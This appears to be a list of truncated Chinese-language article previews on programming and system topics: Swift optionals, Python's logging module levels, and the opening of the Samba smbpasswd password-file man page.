可选值 使用可选(optionals)来处理值可能缺失的情况.可选表示: 有值,等于 x 或者没有值 注意: C 和 Objective-C 中并没有可选这个概念.最接近的是 Objective- ...
- 20180223-logging模块
Python的logging模块提供了标准的日志接口,可以通过它存储各种格式的日志,logging的日志可以依次分为debug().info().warning().error().cirtical( ...
- smbpasswd - Samba加密的口令文件。
总览 SYNOPSIS smbpasswd 描述 DESCRIPTION 此文件是 Samba(7) 套件的一部分. smbpasswd是Samba加密的口令文件.文件中包含了用户名,UNIX用户ID ...